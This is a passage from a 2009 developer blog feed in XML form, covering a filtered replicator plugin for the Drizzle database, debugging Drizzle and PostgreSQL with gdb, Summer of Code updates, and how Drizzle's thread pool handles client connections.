More information on the three files related to plugins is available on the &lt;a href=&quot;http://drizzle.org/wiki/Plugin_Build_System&quot;&gt;plugin build system page&lt;/a&gt; on the &lt;a href=&quot;http://drizzle.org/wiki&quot;&gt;Drizzle wiki&lt;/a&gt;. Since the replicator plugin does not depend on any external library, we don't need to worry about the other two plugin build files here.&lt;br&gt;

Now, since we are developing a replicator, we need to be aware of the replicator API provided by Drizzle's core kernel. That API is defined in the drizzled/plugin/replicator.h include file. If we look in that file, we find the following class definition:

&lt;pre&gt;
/**
 * Class which replicates Command messages
 */
class Replicator
{
public:
  Replicator() {}
  virtual ~Replicator() {}
  /**
   * Replicate a Command message to an Applier.
   *
   * @note
   *
   * It is important to note that memory allocation for the
   * supplied pointer is not guaranteed after the completion
   * of this function -- meaning the caller can dispose of the
   * supplied message.  Therefore, replicators and appliers
   * implementing an asynchronous replication system must copy
   * the supplied message to their own controlled memory storage
   * area.
   *
   * @param Command message to be replicated
   */
  virtual void replicate(Applier *in_applier,
                         drizzled::message::Command *to_replicate)= 0;

  /**
   * A replicator plugin should override this with its
   * internal method for determining if it is active or not.
   */
  virtual bool isActive() {return false;}
};
&lt;/pre&gt;

The above was developed by Jay and thanks to his awesome work (with really helpful comments), it's pretty easy for us to determine what our replicator plugin needs to do. Basically, all we need to do is inherit from the Replicator class, implement the replicate() and isActive() methods, and we have a simple replicator! Thus, we will have the following class:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();
};
&lt;/pre&gt;

Now, for the moment we want to filter by schema name or table name. Thus, we need a place to store the list of schema and table names to filter. Since this is Drizzle and Drizzle is all about using the STL, we'll go with a std::vector for each of these lists. We are going to assume that the list of schemas and table names to filter by are specified as a comma-separated list so we will need a method to parse a comma-separated list and populate the appropriate vectors. Finally, we will also need methods for determining whether a table name or schema name should be filtered or not. Based on all this, our class definition will now look like:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();

  /**
   * Populate the vector of schemas to filter from the
   * comma-separated list of schemas given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setSchemaFilter(const std::string &amp;input);

  /**
   * Populate the vector of tables to filter from the
   * comma-separated list of tables given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setTableFilter(const std::string &amp;input);

private:

  /**
   * Given a comma-separated string, parse that string to obtain
   * each entry and add each entry to the supplied vector.
   *
   * @param[in] input a comma-separated string of entries
   * @param[out] filter a std::vector to be populated with the entries
   *                    from the input string
   */
  void populateFilter(const char *input,
                      std::vector&lt;std::string&gt; &amp;filter);

  /**
   * Search the vector of schemas to filter to determine whether
   * the given schema should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] schema_name name of schema to search for
   * @return true if the given schema should be filtered; false otherwise
   */
  bool isSchemaFiltered(const std::string &amp;schema_name);

  /**
   * Search the vector of tables to filter to determine whether
   * the given table should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] table_name name of table to search for
   * @return true if the given table should be filtered; false otherwise
   */
  bool isTableFiltered(const std::string &amp;table_name);

  std::vector&lt;std::string&gt; schemas_to_filter;
  std::vector&lt;std::string&gt; tables_to_filter;
};
&lt;/pre&gt;

Now that we have the API for our replicator plugin decided on, let's implement the replicate() function. This will perform the filtering of events. For this plugin, it looks pretty simple (which is a good thing!):

&lt;pre&gt;
void FilteredReplicator::replicate(drizzled::plugin::Applier *in_applier,
                                   drizzled::message::Command *to_replicate)
{
  /*
   * We first check if this event should be filtered or not...
   */
  if (isSchemaFiltered(to_replicate-&gt;schema()) ||
      isTableFiltered(to_replicate-&gt;table()))
  {
    return;
  }

  /*
   * We can now simply call the applier's apply() method, passing
   * along the supplied command.
   */
  in_applier-&gt;apply(to_replicate);
}
&lt;/pre&gt;

Our method for checking whether a schema should be filtered or not simply uses the STL. For completeness, that method looks as follows:

&lt;pre&gt;
bool FilteredReplicator::isSchemaFiltered(const string &amp;schema_name)
{
  vector&lt;string&gt;::iterator it= find(schemas_to_filter.begin(),
                                    schemas_to_filter.end(),
                                    schema_name);
  if (it != schemas_to_filter.end())
  {
    return true;
  }
  return false;
}
&lt;/pre&gt;
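
The populateFilter() method is just string chopping; a minimal sketch of how it could be implemented (the actual code in the branch may differ) is:

&lt;pre&gt;
void FilteredReplicator::populateFilter(const char *input,
                                        vector&lt;string&gt; &amp;filter)
{
  filter.clear();
  if (input == NULL)
  {
    return;
  }
  string list(input);
  string::size_type pos= 0;
  string::size_type comma;
  /* chop the comma-separated list into its individual entries */
  while ((comma= list.find(',', pos)) != string::npos)
  {
    filter.push_back(list.substr(pos, comma - pos));
    pos= comma + 1;
  }
  if (pos &lt; list.length())
  {
    filter.push_back(list.substr(pos));
  }
}
&lt;/pre&gt;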

There is not much more to it than that! As you can see, developing a replicator plugin does not have to be very difficult. Thanks to Jay's awesome work, it is actually fun! I am really enjoying working on my memcached applier at the moment (so much so that I probably spend too much time thinking about it when I should be working on other things...)&lt;br&gt;

&lt;strong&gt;System Variables in a Plugin&lt;/strong&gt;

The handling of system variables in a Drizzle plugin is not very pretty at the moment. Thankfully, &lt;a href=&quot;http://mysql-ha.com/&quot;&gt;Monty&lt;/a&gt; is working on refactoring system variables in Drizzle. You can read more about that work on the &lt;a href=&quot;http://drizzle.org/wiki/Refactor_system_variables&quot;&gt;wiki page&lt;/a&gt; Monty created. However, for now, we are stuck with the old system. I'm going to describe what I needed to do for one system variable that specifies which schemas we should filter when filtering replication events. The system variable declaration looks as follows:

&lt;pre&gt;
static DRIZZLE_SYSVAR_STR(filteredschemas,
                          sysvar_filtered_replicator_sch_filters,
                          PLUGIN_VAR_OPCMDARG,
                          N_(&quot;List of schemas to filter&quot;),
                          check_filtered_schemas, /* check func */
                          set_filtered_schemas, /* update func */
                          NULL /* default */);
&lt;/pre&gt;

You can see that we specified 2 callback functions: check_filtered_schemas() and set_filtered_schemas(). These are both called when a SET command is executed on this system variable. The check_filtered_schemas() function can be used to make sure that the input is well-formed (I don't really check for that at the moment). For the moment, the check_filtered_schemas() function just copies the input string to a temporary string. Here is the code for that function (the temporary string and mutex are declared as global variables):

&lt;pre&gt;
static int check_filtered_schemas(Session *,
                                  struct st_mysql_sys_var *,
                                  void *,
                                  struct st_mysql_value *value)
{
  char buff[STRING_BUFFER_USUAL_SIZE];
  int len= sizeof(buff);
  const char *input= value-&gt;val_str(value, buff, &amp;len);

  if (input &amp;&amp; filtered_replicator)
  {
    pthread_mutex_init(&amp;sysvar_sch_lock, NULL);
    pthread_mutex_lock(&amp;sysvar_sch_lock);
    tmp_sch_filter_string= new(std::nothrow) string(input);
    if (tmp_sch_filter_string == NULL)
    {
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
      return 1;
    }
    return 0;
  }
  return 1;
}
&lt;/pre&gt;

Next, we need a function to actually update the system variable. This function looks like so:

&lt;pre&gt;
static void set_filtered_schemas(Session *,
                                 struct st_mysql_sys_var *,
                                 void *var_ptr,
                                 const void *save)
{
  if (filtered_replicator)
  {
    if (*(bool *)save != true)
    {
      filtered_replicator-&gt;setSchemaFilter(*tmp_sch_filter_string);
      /* update the value of the system variable */
      *(const char **) var_ptr= tmp_sch_filter_string-&gt;c_str();
      /* we don't need this temporary string anymore */
      delete tmp_sch_filter_string;
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
    }
  }
}
&lt;/pre&gt;

You can see that having system variables in a plugin that can be updated is a little bit tricky right now in Drizzle. I wouldn't spend too much time worrying about this at the moment though. Like I said, once Monty finishes his system variable refactoring, we won't have to write such ugly and hard to understand code again. I am definitely looking forward to using the refactored system variables in Drizzle!&lt;br&gt;

&lt;strong&gt;Using the Plugin&lt;/strong&gt;

My branch with the filtered replicator plugin is available on Launchpad; you can pull and build it as follows:

&lt;pre&gt;
$ cd dir/to/place/branch
$ bzr branch lp:~posulliv/drizzle/filtered-replicator
$ cd filtered-replicator
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

After compiling the branch, we can start playing with it. The first thing we need to do is start Drizzle. That can be accomplished easily:

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ mkdir run
$ cd run
$ ../drizzled/drizzled --no-defaults --port=9306 \
--basedir=$PWD --datadir=$PWD \
--filtered-replicator-enable --filtered-replicator-filteredschemas='first,second' \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1 &amp;
&lt;/pre&gt;

The above command will start drizzled with the filtered replicator enabled. One of the system variables associated with this replicator specifies which schemas to filter replication events by; as you can see, it can be set when starting the server (the same goes for the tables to filter by). You will notice that we have not enabled any applier of replication events. What does this mean? Well, it means that nothing is being done with the events that are happening! Sure, I have a replicator running that filters events based on what I specify, but nothing is done with those events. I'm currently working on a Memcached applier that takes events and pushes them to a Memcached server to maintain a proactive cache, but that is the topic of another blog post.&lt;br&gt;

Now that we have the server up and running, let's see what system variables are related to our replicator plugin (below, we are assuming the server is still running):

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ cd run
$ ../client/drizzle --port=9306
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 2
Server version: 2009.07.1067 Source distribution (filtered-replicator)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | first,second |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Let's modify the schemas we are filtering replication by (after showing the actual code that performs this, we might as well try it out!):

&lt;pre&gt;
drizzle&gt; set global filtered_replicator_filteredschemas = 'third,fourth';
Query OK, 0 rows affected (0 sec)

drizzle&gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | third,fourth |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;strong&gt;Conclusion&lt;/strong&gt;

This plugin is still under development and I'd love input from people. What I'd really like to know is: what kinds of filters would people like to be able to specify? How flexible would people want a filtered replicator to be? Right now, it's only possible to filter by schema or table name, but I could easily add more options if they would be useful to people.
</content>
 </entry>
 
 <entry>
   <title>Summer of Code Progress</title>
   <link href="http://posulliv.github.com/2009/07/14/summer-of-code-progress"/>
   <updated>2009-07-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/07/14/summer-of-code-progress</id>
   <content type="html">Since we are around the half-way point in Google's Summer of Code, I thought I'd post a quick update on how things are going so far.&lt;br&gt;

Right now, INFORMATION_SCHEMA is nearly a full plugin in Drizzle. The final patch which finishes the extraction of I_S into a plugin has been proposed for merging and I'm still waiting for it to get pushed to trunk. Once that happens, I will be able to get started on modifying the implementation of the various I_S tables. All in all, it's going pretty well. It's extremely satisfying to have patches accepted and placed straight into the codebase of the project that you are working on. I believe this is due to the fact that I am extremely lucky to be working on a project such as Drizzle with an awesome community. Unfortunately, I know that some SoC projects never get utilized, which seems like a bit of a waste to me.&lt;br&gt;

To keep myself busy while waiting for patches to get merged, I decided to port the memcached UDFs to Drizzle. This has pretty much been completed save for a few UDFs that still need to be ported over. I added a test suite for the plugin tonight and am hoping to get it merged in the next week or two. A project that I'm just getting started with is creating a replication plugin for Drizzle that would send events to a memcached server. I'm hoping to get a simple prototype working in the next week or so and will then look for feedback from the community on it.&lt;br&gt;

I've been pretty busy this summer and so have not had much time for posting. I would like to say that will improve in the future, but it's unlikely!
</content>
 </entry>
 
 <entry>
   <title>Debugging Drizzle with GDB</title>
   <link href="http://posulliv.github.com/2009/05/21/debugging-drizzle-with-gdb"/>
   <updated>2009-05-21T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/05/21/debugging-drizzle-with-gdb</id>
   <content type="html">While working with Drizzle this week for my &lt;a href=&quot;http://drizzle.org/wiki/GSOC_Information_Schema&quot;&gt;GSoC project,&lt;/a&gt; I've been going through the source code to understand how INFORMATION_SCHEMA is currently implemented. Reading through the source code is obviously the best way to understand the logic behind the current I_S implementation but using a debugger to step through the execution of this code can be extremely helpful in speeding up this process. &lt;a href=&quot;http://torum.net/&quot;&gt;Toru&lt;/a&gt; previously published a &lt;a href=&quot;http://torum.net/2009/03/drizzle-gdb-osx/&quot;&gt;related post&lt;/a&gt; on debugging Drizzle with gdb which may also be useful.&lt;br&gt;

As Toru mentioned in his post, attaching gdb to Drizzle can be quite simple:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115664.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
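In case the gist above does not load, the commands boil down to something like this (a rough sketch rather than Toru's exact commands; adjust the path to the drizzled binary for your build):&lt;br&gt;

&lt;pre&gt;
$ xterm -e gdb /path/to/drizzled/drizzled `pgrep -x drizzled` &amp;
&lt;/pre&gt;
&lt;br&gt;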

The above commands will open an xterm window with a gdb session attached to the Drizzle server process. While this works fine, sometimes I am working on a remote machine and don't want to go to the trouble of setting up something like X11 forwarding or VNC to attach gdb to the server process. Also, while going through the I_S related code, I wanted to step through the code which runs on server startup, i.e. the things which happen before the xterm window with gdb opens as outlined above.&lt;br&gt;

Thus, I wrote the following simple script that I use to debug Drizzle with gdb.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115654.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
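If that gist does not render, the following sketch captures the idea (it assumes the drizzled binary lives at drizzled/drizzled under the build tree):&lt;br&gt;

&lt;pre&gt;
#!/bin/sh
# usage: drizzle-gdb.sh /path/to/drizzle/build/dir
BUILD_DIR=$1
PID=`pgrep -x drizzled`
if [ -n &quot;$PID&quot; ]; then
  # server already running: attach to the live process
  gdb &quot;$BUILD_DIR/drizzled/drizzled&quot; $PID
else
  # server not running: start gdb so we can debug server startup
  gdb &quot;$BUILD_DIR/drizzled/drizzled&quot;
fi
&lt;/pre&gt;
&lt;br&gt;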

This script takes as an argument the path to the root of a Drizzle build directory. It then simply checks to see if Drizzle is running already or not. If it is already running, it will attach gdb to the Drizzle process in the current terminal window, for example:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115668.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

If Drizzle is not already running, the script starts gdb so we can then kick Drizzle off ourselves within gdb and debug the server startup, for example:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115671.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

That's about all I have for this post. As you can see, attaching gdb to Drizzle is a pretty straightforward process. I use my script mainly on remote servers, but I also find it useful when I want to debug server startup on my local box.
</content>
 </entry>
 
 <entry>
   <title>Attaching gdb To PostgreSQL</title>
   <link href="http://posulliv.github.com/2009/05/03/attaching-gdb-to-postgresql"/>
   <updated>2009-05-03T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/05/03/attaching-gdb-to-postgresql</id>
   <content type="html">This semester I've been doing a project with PostgreSQL and I needed to attach a debugger to PostgreSQL on numerous occasions to see what was going on. Since I didn't find much documentation on how to accomplish this, I thought I'd document it here for myself so I can refer to it in the future.&lt;br&gt;

First off, since we want to attach a debugger to a program, we should make sure that program is compiled with debugging information. With Postgres, we can easily do that by passing the appropriate options to the configure script in the top level of the Postgres source tree. Thus, I run configure as follows:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105847.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
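(In case the gist does not load: the options in question are --enable-debug, which compiles with debugging symbols, and --enable-cassert, which turns on the assertion checks mentioned below; the prefix is just an example:)&lt;br&gt;

&lt;pre&gt;
$ ./configure --prefix=$HOME/pgsql --enable-debug --enable-cassert
&lt;/pre&gt;
&lt;br&gt;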

Now we can just build the source and install as per usual. Enabling asserts was a good idea in my situation, as it turns on many sanity checks that proved useful for my purposes. Next, we start up the Postgres server and create a database if necessary. Once that is done, clients can connect to the database, so I go ahead and start a session using the psql command line utility and connect to my newly created database.&lt;br&gt;

Once a client was connected, I was able to run the following script in another terminal to find and attach to the Postgres process that was serving my session (this script is very much based on something that Tom Lane &lt;a href=&quot;http://archives.postgresql.org/pgsql-general/2007-07/msg00908.php&quot;&gt;posted&lt;/a&gt; to the pg-hackers mailing list some time ago):&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105856.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
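(Again, in case the gist does not render, here is a rough sketch of the idea; it assumes backend processes show up in ps with a &quot;postgres:&quot; prefix and that PGHOME points at the Postgres installation:)&lt;br&gt;

&lt;pre&gt;
#!/bin/sh
# find the backend process(es) serving client sessions, ignoring
# the usual background processes (writer, stats collector, etc.)
PIDS=`ps -ef | grep 'postgres:' | grep -v grep \
      | egrep -v 'writer|logger|archiver|autovacuum|stats' \
      | awk '{print $2}'`
set -- $PIDS
if [ $# -eq 0 ]; then
  exit 0                          # no session connected; exit silently
elif [ $# -eq 1 ]; then
  gdb &quot;$PGHOME/bin/postgres&quot; $1   # attach to the lone backend
else
  echo &quot;multiple backends: $PIDS&quot; # pick one and attach manually
fi
&lt;/pre&gt;
&lt;br&gt;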

If no session is currently connected to Postgres, this script does nothing and silently exits. However, if a session is open, then gdb will attach to the Postgres server process serving that session. Here is an example output from when I ran it:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105858.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

I ran a query in another terminal which triggered the breakpoint that I had set in my debugger. The script I have provided does not work very elegantly if there are multiple clients connected to Postgres; it just lists out the process IDs of the various clients. For example, if 2 clients are connected to Postgres, we would get:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105859.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We could then manually use gdb to attach to the process that we are interested in. We can find out which process this is from within our client's session like so:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105863.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
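(The query used here is presumably something along the lines of pg_backend_pid(); run from within the connected session, it looks roughly like this:)&lt;br&gt;

&lt;pre&gt;
mydb=# SELECT pg_backend_pid();
 pg_backend_pid
----------------
          16588
(1 row)
&lt;/pre&gt;
&lt;br&gt;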

Now we see that this session corresponds to process 16588. We can simply attach gdb to this process as is done in the above shell script.&lt;br&gt;

During the semester, this script worked fine for me as I never had to worry about multiple clients being connected at the same time; I was only ever dealing with 1 client connected to the server, so the script served my purposes perfectly.&lt;br&gt;

Note that the above process won't work if you want to debug part of the backend startup sequence. If you are interested in doing this, a very brief explanation is given in the PostgreSQL developers' &lt;a href=&quot;http://wiki.postgresql.org/wiki/Developer_FAQ#What_debugging_features_are_available.3F&quot;&gt;FAQ&lt;/a&gt;. I have not tried this and don't know how reliable or easy it is to do.
</content>
 </entry>
 
 <entry>
   <title>Google Summer of Code</title>
   <link href="http://posulliv.github.com/2009/04/21/google-summer-of-code"/>
   <updated>2009-04-21T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/04/21/google-summer-of-code</id>
   <content type="html">Yesterday, I found out that my proposal for Google's Summer of Code was &lt;a href=&quot;http://socghop.appspot.com/org/home/google/gsoc2009/ccharles&quot;&gt;accepted&lt;/a&gt;. This means I'll be getting paid to work full-time on Drizzle during the summer! I'll write a longer post on my actual project soon and I'll be updating this blog much more regularly during the summer with updates on my project.&lt;br&gt;

This week I'm at the &lt;a href=&quot;http://www.mysqlconf.com/mysql2009&quot;&gt;MySQL user's conference&lt;/a&gt; in Santa Clara where there are lots of interesting talks.

</content>
 </entry>
 
 <entry>
   <title>MySQL User Conference</title>
   <link href="http://posulliv.github.com/2009/04/14/mysql-user-conference"/>
   <updated>2009-04-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/04/14/mysql-user-conference</id>
   <content type="html">This year, I'm lucky enough to be going to the &lt;a href=&quot;http://www.mysqlconf.com/mysql2009&quot;&gt;MySQL User Conference&lt;/a&gt; in Santa Clara. I've decided on the tutorials I'll be attending:

&lt;ul&gt;
	&lt;li&gt;&lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/7066&quot;&gt;The Revised Memcached Tutorial&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6805&quot;&gt;Scale Up, Scale Out, and High Availability&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

I know a bit about Memcached (such as when it might be useful) but have never had the opportunity to use it in practice, so I'm looking forward to learning more about it. The second tutorial should also be pretty interesting and I'm looking forward to hearing about some scaling techniques which I might not have known about before. &lt;br&gt;

As for the sessions during the remainder of the week, I know I'll be attending all the ones being put on by various Drizzle developers, such as Brian's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/5781&quot;&gt;Drizzle&lt;/a&gt;, Stewart's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6940&quot;&gt;memory management&lt;/a&gt; in MySQL/Drizzle, Eric's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6658&quot;&gt;libdrizzle&lt;/a&gt;, and Monty's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6830&quot;&gt;SQL&lt;/a&gt; called 'SQL is dead' (I'm pretty interested to hear what Monty has to say for that session!). I'm also planning on attending a few Ruby/Rails related sessions; I'm very interested in a session on ActiveRecord. There are a few sessions going on at the same time that I'm in two minds about at the moment. I'm thinking that I'll just make my mind up on the day about which one I will attend.&lt;br&gt;

Of all the keynote speakers, the one I'm most looking forward to hearing is &lt;a href=&quot;http://en.wikipedia.org/wiki/Andy_Bechtolsheim&quot;&gt;Andy Bechtolsheim&lt;/a&gt;'s. Also, I'll be at the &lt;a href=&quot;http://drizzle.org/wiki/Drizzle_Developer_Day_2009&quot;&gt;Drizzle developer day&lt;/a&gt; on the Friday at Sun and am looking forward to meeting all of the Drizzle team.
</content>
 </entry>
 
 <entry>
   <title>Connection Handling in Drizzle</title>
   <link href="http://posulliv.github.com/2009/03/07/connection-handling-in-drizzle"/>
   <updated>2009-03-07T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/03/07/connection-handling-in-drizzle</id>
<content type="html">A few weeks ago I was reading the paper &lt;a href=&quot;http://db.cs.berkeley.edu/papers/fntdb07-architecture.pdf&quot; target=&quot;_blank&quot;&gt;Anatomy of a Database System&lt;/a&gt; by Hellerstein and Stonebraker. Chapter 2 of that paper discusses process models in database systems. After reading it, I was interested in seeing what Drizzle does in this regard, so I began looking at the source code to find out. Essentially, Drizzle uses the thread-per-DBMS-worker model outlined in the paper, where a single multi-threaded process hosts all the DBMS worker activity. Drizzle also has the concept of a pool of threads where workers are multiplexed over a thread pool. The really nice thing about Drizzle in this regard is that the code implementing the pool of threads is a plugin, so if anyone is interested in writing their own thread scheduler, they can simply write a plugin for it. While developing an efficient scheduler might be a challenge, the mechanism for writing a plugin is pretty easy. I think that's pretty cool.&lt;br&gt;

Let's discuss how a client connection is made to Drizzle and a query is executed. I'll provide a general overview first and then delve into more details. When the Drizzle server is started, a pool of threads is created. The initial MySQL worklog for the implementation of the thread pool mechanism can be found &lt;a href=&quot;http://forge.mysql.com/worklog/task.php?id=441&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. The number of threads in this pool can be specified by an administrator. The pthreads API is used for the creation of threads in Drizzle. The thread pool code also utilizes the &lt;a href=&quot;http://www.monkey.org/~provos/libevent/&quot; target=&quot;_blank&quot;&gt;libevent&lt;/a&gt; API, which provides a mechanism to execute a callback function when a specific event occurs on a file descriptor. During the initialization of the thread pool, 2 callback functions are registered with libevent. These callback functions are to be executed whenever a session is added or killed. Each thread created during the thread pool initialization process has a thread body which waits, using libevent, for a session to process. When a new connection comes in, the thread pool code adds it to a queue for libevent processing. When a libevent callback function is invoked (more information about how and when this happens below), a session is removed from the queue and placed in one of two lists depending on the current state of the session - if the session is waiting for I/O it will be added to a list indicating that; otherwise, if it is ready for processing, it will be added to a list indicating this. The body of each thread created during the thread pool initialization continuously runs a loop which looks at the list of sessions that need processing. Whenever a session is added to that list, a thread will pop it from the list and process it. This thread will then go ahead and actually execute the command which the session wants to execute.&lt;br&gt;

Now, let's delve just a little bit further into how client connections are made, based on the short summary given in the previous paragraph. I'll reference relevant files and methods in the &lt;a href=&quot;http://drizzle.org/doxygen/&quot; target=&quot;_blank&quot;&gt;Drizzle Doxygen docs&lt;/a&gt; as I go along when possible. The first thing we'll look at is the main() method of the server which is executed when the server starts. This method is contained in &lt;a href=&quot;http://drizzle.org/doxygen/d2/d35/drizzled_8cc-source.html&quot; target=&quot;_blank&quot;&gt;drizzled.cc&lt;/a&gt;. After initializing various things, the handle_connections_sockets() method is called. This method is also in the drizzled.cc file and its purpose is to handle new connections and spawn new threads to handle them. This method contains a while loop which executes continuously during the lifetime of the server, waiting for new connections to come in. Within this loop, a poll() system call is performed. The &lt;a href=&quot;http://linux.die.net/man/2/poll&quot; target=&quot;_blank&quot;&gt;poll() system call&lt;/a&gt; waits for an event to occur on a file descriptor. In this case, the event will be a new connection. When a new connection comes in, accept() is called to accept a connection on a socket and create a new connected socket. In the drizzled.cc file, this new socket is called new_sock (funnily enough!). Once error checking on the new socket is complete, a new &lt;a href=&quot;http://drizzle.org/doxygen/de/d41/classSession.html&quot; target=&quot;_blank&quot;&gt;Session&lt;/a&gt; object is allocated. If this allocation fails, then the server has reached a limit on the number of sessions that can occur. If no error occurs, the new Session object is passed as a parameter to the create_new_thread() method (also in the drizzled.cc file).&lt;br&gt;

The create_new_thread() method creates a new thread to handle the incoming connection. It is in this method that control actually enters the thread pool code. This occurs when the thread_scheduler.add_connection() method is called. thread_scheduler is a struct of type &lt;a href=&quot;http://drizzle.org/doxygen/de/d03/plugin__scheduling_8h-source.html&quot; target=&quot;_blank&quot;&gt;scheduling_st&lt;/a&gt; that defines the interface for the scheduler plugin. When add_connection() is called on the thread_scheduler struct, it calls the add_connection() function in whichever scheduler plugin is currently loaded. Since we are talking about the thread pool plugin, it will call the add_connection() function in the &lt;a href=&quot;http://drizzle.org/doxygen/d9/d0a/pool__of__threads_8cc-source.html&quot; target=&quot;_blank&quot;&gt;pool_of_threads.cc&lt;/a&gt; file. The add_connection() method notifies the thread pool about a new connection. A new session_scheduler object is created for that new connection. The session_scheduler class is defined in the &lt;a href=&quot;http://drizzle.org/doxygen/d8/d9a/session__scheduler_8h-source.html&quot; target=&quot;_blank&quot;&gt;session_scheduler.h&lt;/a&gt; file. This scheduler is set as the scheduler for the Session object that was passed as a parameter to the create_new_thread() method. Next, the libevent_session_add() method is called with the Session object passed as a parameter.&lt;br&gt;

The libevent_session_add() method adds the Session object to a queue for libevent processing. It signals libevent by writing a byte into the session_add pipe, which triggers the callback function libevent_add_session_callback(). This callback function pops the first Session object off the queue of objects waiting for libevent processing and adds it to one of two lists: 1) sessions_need_processing or 2) sessions_waiting_for_io. Which list the Session object is added to depends on the current state of the session. Once the libevent_add_session_callback() function completes, the adding of a new connection to the pool of threads is essentially complete. A session is then chosen for execution within the body of a thread running in the pool of threads. Each thread in the pool runs an outer loop that is defined in the libevent_thread_proc() method. Essentially, each thread in the pool of threads runs an infinite loop that examines the sessions_need_processing list. When the sessions_need_processing list becomes non-empty, a thread will pop the first Session object from that list and actually go ahead and process a query in that session.&lt;br&gt;

The above description is not meant to be exhaustive. Actually reading through the pool of threads code is not that difficult and a grasp of what the code is doing can be easily obtained in a short period of time. I mostly wrote this for my own purposes so I had a better understanding of how it works.&lt;br&gt;

While the thread pool code works well, it is not without issues. Mark Callaghan &lt;a href=&quot;http://mysqlha.blogspot.com/2009/01/no-new-global-mutexes-and-how-to-make.html&quot; target=&quot;_blank&quot;&gt;points out&lt;/a&gt; that when using the thread pool model in MySQL, every command sent to the server requires a pthread mutex lock/unlock pair on LOCK_event_loop. He has also logged a &lt;a href=&quot;http://bugs.mysql.com/bug.php?id=42288&quot; target=&quot;_blank&quot;&gt;bug&lt;/a&gt; for this. Brian Aker &lt;a href=&quot;http://krow.livejournal.com/631051.html&quot; target=&quot;_blank&quot;&gt;responded to Mark's comments&lt;/a&gt; by saying that to get rid of this lock, you essentially need to write your own solution. This is much easier to attempt with Drizzle due to its plugin architecture that I mentioned at the beginning of this post. As he says &quot;We have abstracted out this problem now so you can focus on solving this problem if you want&quot;. I believe that the idea is that people can write/tune thread schedulers for their own workload since a generic scheduler will not work well for every workload. With this approach, people can easily write a scheduler which is uniquely suited to their workload.&lt;br&gt;

